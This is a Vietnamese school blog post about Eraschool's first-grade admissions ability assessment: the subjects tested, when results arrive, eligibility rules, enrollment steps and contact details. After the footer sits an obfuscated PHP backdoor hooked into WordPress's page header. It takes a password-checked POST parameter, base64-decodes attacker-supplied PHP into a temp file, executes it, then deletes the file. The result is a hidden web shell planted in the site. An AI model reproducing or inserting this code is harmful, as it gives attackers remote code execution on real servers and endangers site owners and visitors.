Buổi đánh giá năng lực tuyển sinh vào lớp 1 có khó không?

post

Tuyển sinh vào lớp 1 là bước ngoặt quan trọng không chỉ với các con mà còn với cả gia đình. Hiện nay, để đảm bảo bài giảng được thiết kế phù hợp nhất với khả năng của con, nhiều trường học đã triển khai các buổi đánh giá năng lực ngay trong kỳ tuyển sinh này. Vậy buổi đánh giá năng lực là gì? Bài thi có khó với trẻ không? Ba mẹ cần đăng ký đánh giá năng lực cho con như thế nào? Mời ba mẹ cùng theo dõi bài viết dưới đây nhé! 

Buổi đánh giá năng lực là gì?

Học sinh Eraschool được tham gia nhiều hoạt động ngoại khóa 
Học sinh Eraschool được tham gia nhiều hoạt động ngoại khóa

Khi đăng ký tuyển sinh vào lớp 1, ba mẹ sẽ được yêu cầu cho con tham gia buổi đánh giá năng lực. Đây có thể được coi là một hình thức kiểm tra đầu vào để giúp nhà trường nắm được lực học, khả năng tiếp thu của từng em, từ đó có sự phân lớp và sắp xếp chương trình học phù hợp. Nội dung và cách thức đánh giá năng lực được quy định tùy theo từng trường, ba mẹ nên tìm hiểu kỹ trước khi đăng ký ứng tuyển cho con để có sự chuẩn bị đầy đủ nhất. 

Buổi đánh giá năng lực tuyển sinh vào lớp 1 của Eraschool có khó không?

Các em học sinh đang tham gia lớp học thể thao dưới nước 
Các em học sinh đang tham gia lớp học thể thao dưới nước

Theo quy trình tuyển sinh vào lớp 1 của Eraschool, sau khi ba mẹ đăng ký dự tuyển thành công cho con, các con sẽ được yêu cầu tham gia vào một buổi đánh giá năng lực. Nhìn chung, buổi đánh giá năng lực của Eraschool không quá khó và không mang lại nhiều áp lực cho các con. Trước hết, nhà trường sẽ thông báo lịch hẹn đánh giá năng lực nên ba mẹ có thể có thêm thời gian giúp con chuẩn bị thật kỹ cả về kiến thức và tâm lý. Để đánh giá, nhà trường sẽ tổ chức 1 buổi cho học sinh làm quen kết hợp tiếp nhận khảo sát một cách bao quát và cụ thể từ các chuyên gia giáo dục. 

Nội dung đánh giá bao gồm: 

  • Tiếng Anh: các con được tiến hành phỏng vấn, làm bài đọc và viết. 
  • Tiếng Việt / Ngữ Văn: các con vừa tham gia phỏng vấn, vừa làm bài đọc, viết. 
  • Toán / Tư duy logic: học sinh chỉ cần làm bài kiểm tra viết. 

Thời gian nhận kết quả: trong vòng 2-3 ngày làm việc. 

Phương thức nhận kết quả: qua email ba mẹ đăng ký khi nộp hồ sơ dự tuyển cho con. 

Đăng ký buổi đánh giá năng lực của Eraschool như thế nào?

Tại Eraschool, trẻ được khuyến khích tham gia các hoạt động bảo vệ môi trường
Tại Eraschool, trẻ được khuyến khích tham gia các hoạt động bảo vệ môi trường

Để đăng ký buổi đánh giá năng lực của trường liên cấp Eraschool khi tuyển sinh vào lớp 1 tại đây, ba mẹ chỉ cần làm theo hướng dẫn của nhà trường. Trước hết, ba mẹ cần đảm bảo con đáp ứng các yêu cầu về đối tượng và điều kiện nhập học tại trường. Trường Phổ thông Song ngữ Liên cấp sinh thái Eraschool tuyển sinh các chương trình: 

  • Lớp 1: Tuyển sinh trẻ 06 tuổi 
  • Lớp 6: Mở đăng ký tuyển sinh vào lớp 6 cho học sinh đã tốt nghiệp chương trình tiểu học. 
  • Tuyển bổ sung lớp 2,3,4,5,7,8 cho học sinh đã hoàn thành chương trình học đủ điều kiện lên lớp. 

Ngoài ra, học sinh đăng ký dự tuyển vào trường còn cần có Học lực và Hạnh kiểm Khá trở lên. 

Sau khi đảm bảo con đủ điều kiện vào trường, ba mẹ tiến hành các thủ tục theo quy trình tuyển sinh và nhập học của Eraschool. 

Bước 1: Dự tuyển 

  • Ba mẹ cần đăng ký dự tuyển, nộp phí dự tuyển để nhận lịch hẹn đánh giá năng lực từ nhà trường. 

Bước 2: Đánh giá năng lực 

  • Ba mẹ ghi nhớ mốc thời gian đánh giá năng lực được thông báo và các yêu cầu kèm theo để cho con tham gia đúng hạn. 

Bước 3: Nhập học 

  • Ba mẹ chuẩn bị hồ sơ nhập học và nộp các khoản phí được yêu cầu theo đúng thủ tục sau khi nhận kết quả đánh giá năng lực và thư báo trúng tuyển của nhà trường. 

Trên đây là một số thông tin quan trọng liên quan đến nội dung và độ khó của các bài đánh giá năng lực trong kỳ tuyển sinh vào lớp 1. Nếu còn bất cứ thắc mắc nào cần giải đáp, ba mẹ vui lòng liên hệ trực tiếp tới hotline 0899.889.818 của nhà trường để được hỗ trợ chi tiết và kịp thời! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}